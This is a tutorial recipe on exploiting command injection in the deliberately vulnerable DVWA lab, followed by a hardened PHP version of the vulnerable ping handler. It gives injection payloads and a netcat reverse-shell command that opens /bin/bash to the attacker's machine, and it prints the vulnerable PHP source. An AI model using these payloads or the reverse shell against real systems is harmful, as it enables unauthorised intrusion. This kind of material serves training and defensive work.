Exploiting OS Command Injections

In the previous recipe, we saw how PHP's system() can be used to execute OS commands on the server; developers sometimes use that instruction, or others with the same functionality, to perform certain tasks, and sometimes they pass unvalidated user input as parameters to the commands they execute.

In this recipe, we will exploit a Command Injection vulnerability and extract important information from the server.

How to do it...

  1. Log into the Damn Vulnerable Web Application (DVWA) and go to Command Execution.
  2. We will see a Ping for FREE form; let's try it by pinging 192.168.56.1 (our Kali Linux machine's IP in the host-only network):

    That output looks like it was taken directly from the ping command's output. This suggests that the server is using an OS command to execute the ping, so it may be possible to inject OS commands.

  3. Let's try to inject a very simple command, submit the following: 192.168.56.1;uname -a.

    We can see the uname command's output just after the ping's output. We have a command injection vulnerability here.

  4. How about without the IP address: ;uname -a:
  5. Now, we are going to obtain a reverse shell on the server; first, we must be sure that the server has everything we need. Submit the following: ;ls /bin/nc*.

    So, we have more than one version of NetCat, the tool that we are going to use to generate the connection. The OpenBSD version of nc does not support the execution of commands on connection, so we will use the traditional one.

  6. The next step is to listen for a connection on our Kali machine; open a terminal and run the following command:
    nc -lp 1691 -v
    
  7. Back in the browser, submit the following: ;nc.traditional -e /bin/bash 192.168.56.1 1691 &

    Our terminal will react with the connection; we now can issue non-interactive commands and check their output.

How it works...

As in the case of SQL Injection, Command Injection vulnerabilities are due to poor input validation and the use of user-provided data to build strings that are later passed to the operating system as commands. If we look at the source code of the page we just attacked (there is a button in the bottom-right corner of every DVWA page), it looks like the following code:

<?php

if( isset( $_POST[ 'submit' ] ) ) {

    $target = $_REQUEST[ 'ip' ];

    // Determine OS and execute the ping command.
    if (stristr(php_uname('s'), 'Windows NT')) {

        $cmd = shell_exec( 'ping  ' . $target );
        echo '<pre>'.$cmd.'</pre>';

    } else {

        $cmd = shell_exec( 'ping  -c 3 ' . $target );
        echo '<pre>'.$cmd.'</pre>';
    }
}
?>

We can see that it appends the user's input directly to the ping command. All we did was add a semicolon, which the system's shell interprets as a command separator, followed by the command we wanted to execute.

After achieving command execution, the next step is to verify whether the server has NetCat. It is a tool that can establish network connections and, in some versions, execute a command when a new connection is established. We saw that the server's system had two different versions of NetCat, and we executed the one we know supports that feature.

We then set our attacking system to listen for a connection on TCP port 1691 (it could have been any other available TCP port) and after that we instructed the server to connect to our machine on that port and execute /bin/bash (a system shell) once the connection is established; anything we send through that connection is therefore received as input by the shell on the server.

The & at the end of the command runs it in the background, which prevents the PHP script from hanging while it waits for the command to return.
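For comparison, here is a hardened version of the same ping handler, written as an added example for this recipe (it is not DVWA's own code and not one of its security levels). It assumes PHP 7.4 or later, where proc_open() accepts an array of arguments and runs the program without a shell; the input is also allow-listed as an IP address before anything is executed.

```php
<?php
// Added example (not DVWA's code): hardened version of the ping handler.
// Two independent defences: allow-list the input as an IP address, and never
// let user-supplied data reach a shell command line at all.

function is_valid_target(string $target): bool
{
    // Strict allow-list: only a syntactically valid IPv4/IPv6 address passes.
    // Inputs such as ";uname -a" or "192.168.56.1;uname -a" fail this check.
    return filter_var($target, FILTER_VALIDATE_IP) !== false;
}

function run_ping(string $target): string
{
    if (!is_valid_target($target)) {
        throw new InvalidArgumentException('target must be an IP address');
    }
    $isWindows = stristr(php_uname('s'), 'Windows NT') !== false;
    // argv as an array: proc_open() (PHP >= 7.4) execs the program directly,
    // so no shell ever parses the value and ';', '&', '|' have no meaning.
    $argv = $isWindows
        ? ['ping', '-n', '3', $target]
        : ['ping', '-c', '3', $target];
    $descriptors = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open($argv, $descriptors, $pipes);
    if (!is_resource($proc)) {
        throw new RuntimeException('could not start ping');
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($proc);
    return $out;
}

if (isset($_POST['submit'])) {
    // Read from $_POST only; the original accepted $_REQUEST, i.e. GET as well.
    $target = $_POST['ip'] ?? '';
    if (!is_valid_target($target)) {
        http_response_code(400);
        echo '<pre>Invalid IP address</pre>';
    } else {
        // htmlspecialchars() also closes the reflected-output (XSS) gap in the
        // original, which echoed raw command output into the page.
        echo '<pre>' . htmlspecialchars(run_ping($target), ENT_QUOTES, 'UTF-8') . '</pre>';
    }
}
```

If an older PHP must be supported, the equivalent is to keep the validation and wrap the value with escapeshellarg() before concatenating it into the shell_exec() string; the allow-list is the primary control either way.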
